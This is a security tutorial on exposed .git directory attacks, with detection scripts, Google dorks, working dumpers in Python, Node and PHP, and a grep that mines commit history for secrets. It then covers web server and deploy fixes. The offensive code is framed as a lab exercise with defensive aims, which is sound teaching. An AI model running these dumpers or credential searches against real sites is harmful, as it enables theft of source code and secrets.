Exposed .git Directory Attack: Detection, Exploitation & Fix (2026)

The first time I tried this was at a client audit in 2010. The brief was "look at the externally-facing WordPress, tell us how nervous to be." I started with the usual stuff, outdated plugins, an exposed wp-config.php.bak, a phpinfo() page someone forgot, and then on a whim I tried https://their-site.example/.git/HEAD. It returned ref: refs/heads/master. I had their entire source tree, every commit, every author email, every file ever checked in, in about forty seconds. Two commits back from HEAD was a .env someone had added "just for local dev" and then "removed" the next day. The Stripe live key was still in there.

I have run that same probe on every web audit I have done since. It still works, regularly, in 2026. WordPress sites are particularly bad about it because shared-hosting deploys tend to be git pull on the live server, but it is not a WordPress problem, it is a deploy-hygiene problem that ships in every language and every framework.

Every time I find one, I think to myself: this sucks. Git adoption among web and WordPress developers has never been great, and somebody here tried to do the better thing. They wanted version control, they wanted a sane deploy workflow, they wanted to stop emailing .zip files around. And the punishment for trying to do it right is that the same tool that was supposed to make them more professional turns out to be the thing that gave away everything: the credentials, the application logic, the half-finished features, the comments to themselves about what was broken and why. Pretty much anything in the repo is now compromised, and the asymmetry of what an attacker can do once they have your source is hard to overstate. I feel for whoever pushed that deploy. There is nothing nice about finding it. But the fix is one line of web server config and a one-minute audit of every other host you own, so the second time around nobody has to feel like that.

For context: I have spent twenty-five years building and auditing WordPress and PHP applications, started my own agency in 2011, and have helped countless developers work through exactly this class of problem. This is the kind of finding that shows up over and over again in audits and I have argued the same fix into a lot of deploy pipelines. Last re-tested against current Apache 2.4, nginx 1.27, LiteSpeed 6.3, Caddy 2.8, and IIS 10 in May 2026.

TL;DR

The exposed .git directory attack is a vulnerability where a web server publicly serves the .git/ folder of a deployed application, letting any remote attacker reconstruct the full source code, the entire commit history, and every secret that has ever been committed by walking the git object database one HTTP request at a time. No authentication is required, the technique works on any web server (Apache, nginx, LiteSpeed, Caddy, IIS), and credentials that were "deleted" with a follow-up commit are still recoverable because git's content-addressable storage never removes referenced blobs.

If a webserver returns a body for https://target/.git/HEAD matching ref: refs/heads/<branch>, the .git/ directory is exposed. Git's on-disk format is content-addressable: every object is identified by the hash of its contents (SHA-1 in the overwhelming majority of repos in the wild, with SHA-256 repositories an option since Git 2.29 and rare in practice). Objects live at .git/objects/<first-two-hex>/<remaining>. Given the head hash, a remote attacker walks the commit graph by fetching one object at a time over plain HTTP, no authentication needed.

You end up with the full repo, including any credentials that were committed and then "removed", those still live in object history forever. The vulnerability is CWE-527, and the category it sits in is OWASP A05:2021 Security Misconfiguration. The fix is one line in your web server config.

This article walks the detection (browser, curl, or a small bash wrapper), the reconstruction (three reference dumpers in Python, Node, and PHP, plus a Bash quick-check, all under 200 lines each), the credential mining once you have the repo, and the deploy-side fix that actually prevents it from happening again.

What this attack is called

The umbrella name is ".git directory exposure" or "exposed .git folder". The exploitation step where you reconstruct the repo from loose objects and pack files is ".git source code disclosure" or "git repository reconstruction". The catalog identifiers are:

CWE-527, Exposure of Version-Control Repository to an Unauthorized Control Sphere (MITRE)
OWASP Top 10 A05:2021, Security Misconfiguration, is the category this lives in (OWASP's official A05 CWE-mapping list does not enumerate CWE-527 explicitly, but the class of mistake belongs there)

The reference tools you will see in writeups and talks, with the tradeoffs that matter when you pick one:

Tool	Language	Install	Pack-file support	Brute-force ref names	Concurrency	Active in 2026
git-dumper	Python	`pip install git-dumper`	Yes	Yes	Yes (configurable)	Yes
GitTools / Dumper	Bash + Perl	`git clone`	Yes (via Extractor)	Limited	Yes (xargs -P)	Maintenance only
GitHack	Python 2/3	`git clone`	Yes	Yes	Yes (threads)	Yes
goop	Go	`go install`	Yes	Yes	Yes	Yes
DVCS-Ripper	Perl	`cpan install`	Partial	Yes	No	Maintenance only

If I had to pick one for a real engagement today I would pick git-dumper: it handles every edge case the others handle, the Python install is trivial, the concurrency knob is exposed, and it gracefully degrades when the server blocks directory listings. GitTools is the better choice if you are working from a CTF box that has Bash and not much else. GitHack matters historically because it was the first widely-used dumper and a lot of older Chinese-language writeups reference it; the modern fork is fine. goop and DVCS-Ripper are situational.

I will write minimal versions of the same logic below so you can see exactly what these tools are doing under the covers.

Why I find this attack interesting

Three reasons it is worth your time as either an attacker or a defender:

It is trivial to test. A single curl against /.git/HEAD tells you whether you have a finding. No special tooling, no traffic that looks like an attack, no authentication. The probe is indistinguishable from a 404 hunt.
Credentials in history are the prize. Developers commit .env files, AWS keys, database passwords, signing certificates. They notice, they git rm the file, they push a "remove .env" commit and assume it is gone. It is not. The file content is still a blob in .git/objects/, reachable from the commit that originally added it. Every reconstruction tool dumps these by default.
You get an inside view of the application. Source code disclosure is not just about credentials. You get the actual logic, the named function calls, the validation patterns, the comments that say "TODO: fix this auth check". Every subsequent attack you run against the same target has the source code in your other monitor. The asymmetry shifts hard in the attacker's favour.

That third point is what most writeups undersell. A leaked password is a finding. A leaked codebase is a campaign.

Setting up the lab

If you want to follow along on your own machine, the article uses a deliberately-vulnerable WordPress install via @wordpress/env with a fake .git/ dropped into wp-content/uploads/. The repo has four commits and one of them adds a .env with fake AWS and Stripe credentials, the next of which "removes" it. The full setup commands are in the techearl-labs source-code-disclosure README; the short version is one docker exec to seed the fake repo.

Everything below was captured against that lab running at http://localhost:8888. The technique is identical against a real target, only the URL changes.

Step 1: Detection

The signature of an exposed .git/ is two files: HEAD and config. Both should return a 200 with a recognisable body.

The fastest possible test is to paste the URL straight into a browser. https://target/.git/HEAD either renders four words of plain text (ref: refs/heads/main) or it returns 404. No tooling, no extension, no DevTools needed. If the four words are there, you have a finding and you can move to the dump step. This is one of the very few security probes you can run from a phone.

Same check from a terminal, useful when you are working through a list of hosts:

bash

# HEAD: text/plain, body matches "ref: refs/heads/<branch>"
curl -s http://target/.git/HEAD
# ref: refs/heads/main

# config: text/plain, body contains a [core] section
curl -s http://target/.git/config
# [core]
#         repositoryformatversion = 0
#         filemode = true
#         bare = false
#         logallrefupdates = true

Anything other than those two responses (404, 403, an HTML error page, a redirect to a login) means the .git/ is not reachable.

Browser-side it looks like this, the URL bar has /.git/HEAD and the page body is the four-word response:

Browser address bar showing http://localhost:8888/wp-content/uploads/.git/HEAD with the response body 'ref: refs/heads/main' rendered as plain text — The minimum-viable proof of exposure. If a browser renders this, the entire repository is reachable from the same origin.

Where to look (common paths by CMS)

Document root is the obvious probe, but the bug also lives wherever a developer git init'd a sub-tree and the webserver still serves that sub-tree as static files. Most of the real-world hits I have seen are in subdirectories, not at the docroot, because the developer was working on one specific theme or module and never thought of it as "deploying a repo". Hit the docroot first, then walk the platform-specific spots:

WordPress

code

/.git/HEAD
/wp-content/.git/HEAD
/wp-content/uploads/.git/HEAD
/wp-content/themes/.git/HEAD
/wp-content/themes/<theme-slug>/.git/HEAD
/wp-content/plugins/.git/HEAD
/wp-content/plugins/<plugin-slug>/.git/HEAD
/wp-content/mu-plugins/.git/HEAD

The single most common WordPress hit in my experience is the custom-plugin path: a development plugin started life as git clone <internal-repo> /wp-content/plugins/client-tools on the dev server and got rsynced to production with the .git/ intact. Theme directories are second.

Drupal (7, 9, 10, 11)

code

/.git/HEAD
/sites/default/.git/HEAD
/sites/all/.git/HEAD
/modules/custom/.git/HEAD
/modules/contrib/.git/HEAD
/themes/custom/.git/HEAD
/themes/contrib/.git/HEAD
/profiles/<profile-name>/.git/HEAD

For Composer-based Drupal installs the project root sits one level above /web, which is the intended docroot. The repo is at the project root, not inside /web. The bug shows up when the webserver is misconfigured to serve the project root instead of /web (so /.git/HEAD is hit), or when someone ran git init inside web/ itself.

Joomla

code

/.git/HEAD
/components/com_<name>/.git/HEAD
/modules/mod_<name>/.git/HEAD
/plugins/<group>/<plugin>/.git/HEAD
/templates/<template>/.git/HEAD
/administrator/.git/HEAD

Magento 2

code

/.git/HEAD
/app/.git/HEAD
/app/code/<Vendor>/<Module>/.git/HEAD
/app/design/frontend/<Vendor>/<Theme>/.git/HEAD
/pub/.git/HEAD

Laravel / generic PHP framework

code

/.git/HEAD                (most common, the project root one level above public/ ends up served)
/public/.git/HEAD         (less common, but happens when public/ itself was the git root)

Node / Next.js / static / SPA

code

/.git/HEAD
/.next/.git/HEAD
/public/.git/HEAD
/build/.git/HEAD
/dist/.git/HEAD

For an unknown stack, hit / first, then enumerate the typical subdirectories with a wordlist. feroxbuster -u https://target/ -w wordlist.txt -x .git/HEAD works; so does a one-liner that iterates detect.sh over a known platform's path list. The combinatorial bit (<theme-slug>, <plugin-slug>, <Vendor>/<Module>) only resolves once you know what is installed, which is usually obvious from the rendered HTML (theme stylesheets, plugin asset paths, generator meta tags).

Discovery via search engines

Before you probe any specific target, the unauthenticated reconnaissance pass is to ask Google what it has already indexed. The classic dorks for this attack:

code

inurl:".git/HEAD"
inurl:".git/config"
intitle:"Index of /.git"

The first two find directly-exposed text files; the third finds servers that return Apache or nginx autoindex pages for the directory itself (older configs, embedded devices, internal tools accidentally indexed). Bing has the same operators and sometimes surfaces results Google has demoted. Shodan and Censys can also be used: http.title:"Index of /.git" returns the autoindex variant.

These dorks are passive: you are reading Google's index, not touching the target. They are also the most likely way an attacker finds your site, so running them against your own domains (site:yourdomain.com inurl:".git") is a free audit that does not appear in your own access logs.

The mistake-shape is always the same: someone wanted version control for a specific piece of the application, ran git init inside that piece (rather than for the whole project), and never told the deploy pipeline about it. Production rsync/scp/cp carried the .git/ along.

For more than a handful of targets I use a tiny Bash wrapper that does both checks and returns a non-zero exit code if either fails. The full source is at techearl-labs/source-code-disclosure/scripts/detect.sh:

bash

#!/usr/bin/env bash
# detect.sh, does <target>/.git/HEAD + /.git/config exist?
TARGET="${1%/}"

check() {
  local path="$1" pattern="$2"
  local body status
  status=$(curl -sS --max-time 10 -o /tmp/_check.$$ -w "%{http_code}" "${TARGET}${path}")
  body=$(cat /tmp/_check.$$); rm -f /tmp/_check.$$
  [[ "$status" == "200" && "$body" =~ $pattern ]]
}

hit=0
check "/.git/HEAD"   "ref: refs/heads/" && { echo "  /.git/HEAD   EXPOSED";   hit=1; }
check "/.git/config" "\[core\]"          && { echo "  /.git/config EXPOSED";   hit=1; }
[[ $hit -eq 1 ]] && exit 0 || exit 1

Running it against the lab:

Terminal output of detect.sh against the lab WordPress, showing /.git/HEAD and /.git/config both returning HTTP 200 and matching the expected patterns, followed by an EXPOSED status line — Two HTTP 200s with the right body shape. That is enough to escalate to a full dump.

Step 2: Reconstructing the repository

Once you have confirmed exposure, the next step is to download every object and rebuild the working tree locally. This is where the four reference dumpers come in.

The strategy is the same in every language:

Fetch the well-known index files (HEAD, refs/heads/*, packed-refs, logs/HEAD, objects/info/packs, and a handful of common ref paths). These give you the head SHA and any ref tips.
Extract every object hash from those files. Plain-text refs and commit objects encode the hash as hex (40 chars for SHA-1, 64 for SHA-256). Tree objects encode the hash as raw binary bytes after each <mode> <filename>\0 entry header (20 bytes for SHA-1, 32 for SHA-256), a detail a lot of toy ports miss, which leaves them unable to fetch any blob content. The reference scripts in this article assume SHA-1, which still covers essentially every repo you will encounter in the wild; if you hit a SHA-256 repo (extensions.objectFormat = sha256 in .git/config), bump the byte counts.
For each SHA, fetch /.git/objects/<aa>/<bbbb...> (loose object). On a 200, save the bytes, zlib-inflate them, and extract any new SHA references they contain. Push those into the queue.
Repeat until the queue is empty.
Hand the resulting .git/ directory to a real git binary for inspection.

Python

techearl-labs/.../git-dump.py, standard-library only, no pip install, no requirements.txt. The core loop:

python

import re, zlib, urllib.request
from pathlib import Path

SHA_RE = re.compile(rb"\b[0-9a-f]{40}\b")

def shas_from(data: bytes) -> set[str]:
    """Hex SHAs (refs, commits) AND raw-binary SHAs (tree entries)."""
    out = {m.decode() for m in SHA_RE.findall(data)}
    if data.startswith(b"tree "):
        i = data.index(b"\x00") + 1
        while i < len(data):
            nul = data.find(b"\x00", i)
            if nul == -1 or nul + 20 > len(data): break
            out.add(data[nul + 1 : nul + 21].hex())
            i = nul + 21
    return out

def fetch(url):
    try:
        with urllib.request.urlopen(url, timeout=15) as r: return r.read()
    except Exception: return None

def dump(base, out_dir):
    queue, seen = set(), set()
    for rel in ["HEAD", "config", "packed-refs", "logs/HEAD",
                "info/refs", "objects/info/packs",
                "refs/heads/main", "refs/heads/master"]:
        data = fetch(f"{base}/.git/{rel}")
        if data is None: continue
        (out_dir / ".git" / rel).parent.mkdir(parents=True, exist_ok=True)
        (out_dir / ".git" / rel).write_bytes(data)
        queue |= shas_from(data)
    while queue:
        sha = queue.pop()
        if sha in seen: continue
        seen.add(sha)
        data = fetch(f"{base}/.git/objects/{sha[:2]}/{sha[2:]}")
        if data is None: continue
        p = out_dir / ".git" / "objects" / sha[:2] / sha[2:]
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
        try: queue |= shas_from(zlib.decompress(data)) - seen
        except zlib.error: pass

Run it against the lab:

Terminal output of git-dump.py running against the lab WordPress, fetching .git/HEAD, .git/config, .git/refs/heads/main, then walking nine objects (commits, trees, blobs) until the queue is empty — The dumper walks every reference, fetches each loose object, inflates it, finds new references, and loops until the queue is empty. Nine objects in this lab; production repos run into thousands.

Node

git-dump.mjs, Node 18+, uses the built-in global fetch, no npm install. Same logic, ES modules:

javascript

import { mkdir, writeFile } from "node:fs/promises";
import { inflateSync } from "node:zlib";

const SHA_RE = /\b[0-9a-f]{40}\b/g;

function shasFrom(buf) {
  const out = new Set();
  for (const m of buf.toString("binary").matchAll(SHA_RE)) out.add(m[0]);
  if (buf.slice(0, 5).toString() === "tree ") {
    let i = buf.indexOf(0) + 1;
    while (i < buf.length) {
      const nul = buf.indexOf(0, i);
      if (nul === -1 || nul + 20 > buf.length) break;
      out.add(buf.slice(nul + 1, nul + 21).toString("hex"));
      i = nul + 21;
    }
  }
  return out;
}

async function fetchBytes(url) {
  try {
    const res = await fetch(url, { signal: AbortSignal.timeout(15_000) });
    return res.ok ? Buffer.from(await res.arrayBuffer()) : null;
  } catch { return null; }
}

The walking loop is identical to the Python version.

PHP

git-dump.php, PHP 7.4+, needs the curl and zlib extensions, which are not strictly default but are enabled on basically every shared-hosting and Docker PHP image you will encounter (php -m | grep -E 'curl|zlib' confirms). This is the version that matters most in the field: a lot of the targets where this attack actually pays off are cheap shared-hosting boxes where you already have a PHP shell from some other finding, and dropping a single git-dump.php file is faster than scp-ing a Python build.

php

function shasFrom(string $data): array {
    $out = [];
    if (preg_match_all('/\b[0-9a-f]{40}\b/', $data, $m))
        foreach ($m[0] as $sha) $out[$sha] = true;
    if (strncmp($data, 'tree ', 5) === 0) {
        $i = strpos($data, "\0") + 1;
        while ($i < strlen($data)) {
            $nul = strpos($data, "\0", $i);
            if ($nul === false || $nul + 20 > strlen($data)) break;
            $out[bin2hex(substr($data, $nul + 1, 20))] = true;
            $i = $nul + 21;
        }
    }
    return array_keys($out);
}

Bash (quick-and-dirty)

For completeness, wget --mirror works on the simplest case, because git serves loose objects as static files and the index pages link them:

bash

wget --mirror --include-directories=/.git http://target/
cd target && git checkout -- .

This only works if directory listings are enabled or if objects/info/packs happens to enumerate every pack. In the modern case where the server returns a 403 for the .git/ directory listing but serves individual files just fine, you need to walk the object graph manually, which is why the Python/Node/PHP versions above exist.

Step 3: What you actually get

After the dump completes, the output directory is a normal git repository. Hand it to a real git binary:

bash

cd dumped/
git fsck --full
git log --all --oneline
git log --all -p

The interesting query is the one that mines history for committed secrets:

bash

git log --all -p | grep -iE 'password|secret|token|api_key|aws_|stripe_'

Against the lab, git log --all -p -- .env shows exactly what we hoped for:

Terminal showing git log --all -p output revealing the recovered .env file from history, including DB_PASS=Sup3rS3cret-billing-2019, STRIPE_SECRET_KEY=sk_live_..., and AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE, all marked with green + lines in the original commit and red - lines where they were 'removed' — The reconstructed history. The .env was added in commit 2, 'removed' in commit 3. The credentials are still in the repository forever, git's content-addressable storage does not delete anything that a reachable commit still points to.

Three credential types in one commit: a database password, a Stripe secret key, and an AWS access key + secret. All "deleted" two commits later. All still recoverable. Plenty of leaked repos hand you password hashes rather than plaintext (a seeded users table, a config with a hashed admin password), at which point the recovery turns into an offline cracking problem and choosing the right attack mode, dictionary versus brute force versus mask versus hybrid, is what decides whether you get anywhere. The values in this lab are intentionally fabricated, and worth being explicit about so nobody flags this as a real leak: AKIAIOSFODNN7EXAMPLE is AWS's published documentation-stub key, and 4eC39HqLyjWDarjtT1zdp7dc is the random-looking suffix Stripe uses across their public API documentation under the sk_test_ prefix. The lab uses the sk_live_ prefix on the same suffix purely to make the demo visually scarier; the full string is not a real credential. I have seen the real thing in real audits, which is why the demo uses these shapes.

How git "deletes" things (it does not)

The thing worth internalising: git rm does not delete file contents. It records a new commit whose tree no longer includes the file. The blob, the actual bytes of the file, stays in .git/objects/ and is reachable from every prior commit that did include the file. It only goes away when all reachable refs no longer include any commit pointing at it, and garbage collection runs (git gc --prune=now), and no reflog entry still references those commits.

On a typical shared-hosting deploy, none of those conditions hold. The push history is intact, git gc has never been run with --prune=now, and the reflog goes back to the first push. Anything that was ever committed is still in there.

This is why a security incident involving a leaked secret in a commit cannot be resolved by git rm + git commit + git push. The only resolution is rotating the secret. Treat the credential as compromised the moment the commit hits a server you do not fully control.

Why this happens in the wild

The deploy-time anti-pattern is the same across every framework I have seen:

git clone or git pull on the production server. Whatever sits at the deployment root becomes the document root. .git/ rides along.
rsync without --exclude=.git. I have seen this in production runbooks. rsync -avz local/ user@server:/var/www/ ships .git/ every time.
A shared-hosting cp -R from a Composer / npm working directory. Same outcome, anything in the source tree ends up under the webroot.
A .zip of the project root delivered to the host via cPanel's file manager. Same outcome again.
wp-content/uploads/ used as a generic dumping ground for "let me clone a quick thing to test." WordPress in particular makes this trivial because the uploads directory is world-readable for media serving.

CI/CD pipelines that build a deploy artifact (tar, zip, container image with a multi-stage COPY that excludes the build context) avoid this entirely because the .git/ directory was never in the artifact in the first place. The teams I see getting hit are the teams who treat the production server as a checkout.

Fixing it

There are two layers of fix, and you want both.

Layer 1: Web server config

This is the immediate stop-the-bleeding fix.

Apache (in .htaccess at the document root, or in a <Directory> block in the vhost config):

apache

RedirectMatch 404 /\.git
# Alternative using mod_rewrite (returns 403 Forbidden instead of 404):
# RewriteEngine On
# RewriteRule "(^|/)\.git" - [F]

The two rules are not strictly equivalent: RedirectMatch 404 returns 404 (the same status the attacker would see for any other non-existent path, which is what you usually want), while [F] returns 403. Either blocks access; pick the response code that matches the rest of your error policy. Note also that both patterns will block paths like .gitignore, .github, and .gitkeep in addition to .git/. That is almost always what you want (no reason for any of those to be reachable from the public web). If you specifically want to block only the .git/ directory, tighten the regex to (^|/)\.git(/|$).

nginx (in the server block):

nginx

location ~ /\.git {
    deny all;
    return 404;
}

LiteSpeed and OpenLiteSpeed read .htaccess files, but only the rewrite-rule subset (mod_alias directives like RedirectMatch are silently ignored). Use a RewriteRule form instead, which works on Apache too:

apache

RewriteEngine On
RewriteRule "(^|/)\.git" - [F,L]

On a LiteSpeed vhost configured directly without .htaccess, the same rule goes under the vhost's Rewrite section in the admin UI.

Caddy (in the Caddyfile):

code

@git path_regexp /\.git
respond @git 404

IIS (in web.config, inside <system.webServer><rewrite><rules>):

xml

<rule name="Block dotgit" stopProcessing="true">
  <match url=".*" />
  <conditions>
    <add input="{REQUEST_URI}" pattern="/\.git" />
  </conditions>
  <action type="CustomResponse" statusCode="404" statusReason="Not Found" />
</rule>

WordPress-specific note: if your install is behind nginx, the rule above goes in the same server block as your other WordPress rules. If you are on Apache or LiteSpeed shared hosting, the RedirectMatch line goes in the same .htaccess that WordPress maintains for permalinks, put it above the # BEGIN WordPress marker so WordPress's permalink editor does not overwrite it.

After applying any of the rules:

bash

curl -I http://target/.git/HEAD
# HTTP/1.1 404 Not Found

If it still returns 200, the rule did not load. Check that mod_rewrite is enabled on Apache, that AllowOverride All is set on the document root, that LiteSpeed's .htaccess reading is on at the server level (it is by default on cPanel + LiteSpeed but can be disabled), and that nginx / Caddy / IIS were reloaded after the config change.

Layer 2: Stop deploying `.git/` in the first place

The web server fix patches one server. The deploy hygiene fix patches the pipeline, which is what prevents recurrence on every other server.

Build artifacts in CI, not on the production host. A git archive or a tar --exclude='.git' produces a deploy bundle that physically cannot contain the directory.
Use rsync's --exclude='.git' if you must rsync from a working tree.
Container images: use a .dockerignore with .git on the first line. This also dramatically shrinks image size, so it pays for itself.
Add a CI gate: unzip the deploy artifact in a pre-deploy step and find . -name '.git' -type d -print -quit, if anything matches, fail the pipeline.

Layer 3: Audit your own externally-facing properties

Run the detection script across everything you own. It is one minute of work and surfaces the bug before someone else does:

bash

for host in $(cat my-domains.txt); do
  ./detect.sh "https://$host"
done

The detect.sh from the lab works as-is. Feed it every domain on your registrar account, every staging host, every old microsite nobody has touched in three years. Old, forgotten properties are where this bug lives most reliably. The same forgotten-asset blind spot is what feeds the Meow attack that wipes exposed databases for no reason: an internet-reachable thing nobody is watching gets found and ruined by a bot before any human notices it is open.

What `git-dumper` and `GitTools` do that this article does not

The reference scripts above are intentionally minimal. The production tools add things that matter in real engagements:

Brute-forcing common ref paths and filenames. Real repos have refs/heads/feature/*, refs/tags/*, refs/remotes/origin/* that my fixed list of known files misses.
Concurrent fetching. A single-threaded walk through a 10k-object repo over the internet is slow. Real tools fan out 10-50 requests in parallel.
Pack-file handling. Repos that have been git gc'd store most objects inside .pack files instead of as loose objects. My reference dumpers fetch objects/info/packs and any .pack files it references, but they do not extract objects from the pack file, they let the local git binary do that. git-dumper handles pack-file parsing natively.
Retry + rate-limiting. Anything serving real traffic is going to throttle a flood of .git/objects/aa/bbbb... requests. Production tools back off.

For a real engagement, use git-dumper. For learning what git-dumper is doing, the reference scripts above are 200 lines and dependency-free.

Real-world disclosures

Two public examples where this exact bug had real impact on real organisations:

Mozilla Bugzilla #1509328 (2018). A researcher reported "source code disclosure due to publicly available .git endpoint" on surveillance.mozilla.org/.git. The bug warned that the full source could be fetched with GitTools; it was triaged and resolved as a duplicate of an earlier related bug. A Mozilla-operated infrastructure host running the same anti-pattern this article documents.
United Nations / ILO / UNEP (January 2021). Sakura Samurai found an exposed .git/ on an ILO (International Labour Organization) subdomain. Inside the recovered repository were credentials to a private GitHub organisation tied to the UN Environment Programme; via those credentials they reached private repos and database credentials and ultimately surfaced over 100,000 UNEP employee records. The initial foothold was the two-request probe documented earlier in this article. Public writeup and timeline at johnjhacking.com/blog/unep-breach/.

The shape is the same in both: someone deployed a checkout, the dotfile directory came along, an external researcher found it before the asset owner did. Mozilla resolved it as a duplicate (the bug had already been reported elsewhere on their infrastructure); the UN case produced a six-figure PII exposure off a single subdomain's exposed git history. The technique is not novel; the impact is what the bounty programmes (and the headlines) are responding to.

The same deploy-hygiene mistake hits every version-control system, not just git. The detection probes are different, the impact is identical:

VCS	Detection probe	Notes
Subversion	`/.svn/wc.db`, `/.svn/entries`	SQLite database since SVN 1.7; older repos have plain-text `entries` files
Mercurial	`/.hg/store/00manifest.i`, `/.hg/requires`	Less common in modern deployments but still found on legacy installs
Bazaar	`/.bzr/branch-format`, `/.bzr/checkout/format`	Rare; Bazaar usage has collapsed since 2017
Filesystem metadata	`/.DS_Store`	macOS-only, not a VCS, but the same kind of unintentional leak; reveals every filename in the deploying developer's working directory

The fix layer is the same: deny dotfile directories at the web server, do not deploy from a working tree, scan deploy artifacts in CI before shipping.

Where to go next

PHP filter source disclosure is the parallel attack against PHP applications that exposes source code through php://filter/convert.base64-encode. Same outcome (source code in your hands), different vector.
Argument injection, once you have the source, the next-most-common payoff is finding a passthru() / shell_exec() call that takes user input directly. The source disclosure tells you exactly which parameter to target.
The web application security vulnerabilities taxonomy covers where source-code disclosure sits among the other classes of bugs you should be probing for in the same audit.
The techearl-labs source-code-disclosure directory has all four scripts, the lab setup, and the README, clone it and try it against your own WordPress.

No. This attack only works when a webserver in front of a deployed checkout is serving the .git/ directory as static files. GitHub and GitLab serve repos through their own application code (the smart HTTP protocol, with authentication), not as raw filesystem. You cannot fetch .git/HEAD from github.com/user/repo/.git/HEAD and get anything useful, GitHub returns a 404 or routes you to the rendered repo page. The vulnerability lives at the deploy boundary, where someone copied a working tree to a webroot.

Stops new dumps, does nothing about historical exposure. Any attacker who already dumped the repo has it, and you cannot tell from the server logs whether anyone did, because every individual GET looks like a legitimate static-file request. If you find .git/ exposed on a production server, the right response is: rotate every credential that was ever committed (treat them all as compromised), audit your access logs for sustained 200 responses to /.git/objects/* paths over a single user-agent (the IOC for a dump in progress), and then remove the directory. Removing the directory alone is denial.

Yes, same shape. Subversion's .svn/wc.db, Mercurial's .hg/store/, and Bazaar's .bzr/ all encode the full repository state and all have the same deploy-hygiene problem. The detection probes are different (/.svn/entries, /.hg/store/00manifest.i, /.bzr/branch-format) but the underlying mistake, shipping the VCS metadata directory to production, is identical. CWE-527 covers all of them.

Still rampant. Apache's default vhost still does not deny dotfile directories, you have to add the rule yourself. nginx's default config does not either; the popular nginx WordPress recipes most tutorials copy-paste have a deny rule for .ht* (for .htaccess / .htpasswd) but not for .git. Both major control panels (cPanel, Plesk) do not add a .git rule unless you ask. The bug rides on the absence of an opt-in rule, not the presence of a misconfiguration, which is exactly the failure mode that does not get fixed at scale. I find one or more in nearly every WordPress audit I run, and large-scale public scans of the web that get posted every year or so are consistently in the same neighbourhood: not a long-tail bug, very much current.

Two HEAD requests per host (one to /.git/HEAD, one to /.git/config) is enough to confirm or rule out exposure. That is nothing, a thousand hosts is 2000 requests spread across whatever rate your scanner runs at. The detect.sh in the lab does GET (because it needs the body to pattern-match) but the same logic works with HEAD if you only care about the status code, at the cost of a small false-positive rate from servers that return 200 for HEAD on paths that 404 on GET. For very large portfolios I run a single-shot scanner that does HEAD-only against /.git/HEAD across the full asset list, then GET-confirms the hits.

Cloudflare's default WAF rules do not block /.git/HEAD specifically, there is no signature that would distinguish 'attacker probing for an exposed .git' from 'CI tool fetching a deploy hook'. Some commercial WAFs (Imperva, F5) have dotfile-path rules in their default policies that block /.git/, /.svn/, /.hg/ on principle, which is the correct default. If your WAF does not, you can add the rule yourself in a few minutes. Two important caveats: a WAF rule is a defence in depth on top of the web server config (do both, not either-or), and the rule has to be at the WAF layer rather than the origin layer, a WAF rule that only fires on traffic that already reached origin does not help if there is a CDN cache in front that already served the file once.

Same as any unauthenticated probing of a target you do not own. detect.sh issues two GETs and consumes a handful of bytes of bandwidth, defensible as a 'web request' under most computer-misuse statutes, the same as accidentally typing the URL in a browser. The full dump is different: thousands of requests, downloading the entire source tree of a system you do not own, with clear intent. That is unauthorised access in every jurisdiction I have looked at, and the script's user-agent string identifying itself does not change that. Run the full dump only against targets you own or have written permission to test. Bug-bounty programmes with formally-scoped engagement letters are fine; cold-probing a stranger's WordPress is not.

Exposed .git Directory: How Attackers Reconstruct Your Source Code

TL;DR

What this attack is called

Why I find this attack interesting

Setting up the lab

Step 1: Detection

Where to look (common paths by CMS)

Discovery via search engines

Step 2: Reconstructing the repository

Python

Node

PHP

Bash (quick-and-dirty)

Step 3: What you actually get

How git "deletes" things (it does not)

Why this happens in the wild

Fixing it

Layer 1: Web server config

Layer 2: Stop deploying `.git/` in the first place

Layer 3: Audit your own externally-facing properties

What `git-dumper` and `GitTools` do that this article does not

Real-world disclosures

Where to go next

Sources

Ishan Karunaratne

Related posts

php://filter Source Disclosure: How Attackers Read PHP Source via LFI

API Security Attacks: The Complete 2026 Practitioner Guide

How to Set the Desktop Wallpaper From the macOS Command Line

Does this work on private repos hosted on GitHub or GitLab?

Does removing the .git directory after the fact help?

What about .svn, .hg, .bzr? Same attack?

Is this still a problem in 2026 or have most platforms fixed it?

How do I scan a large portfolio for this without hammering my own infra?

Will a WAF block this?

What is the legal exposure of running the dump scripts?

Sources

Ishan Karunaratne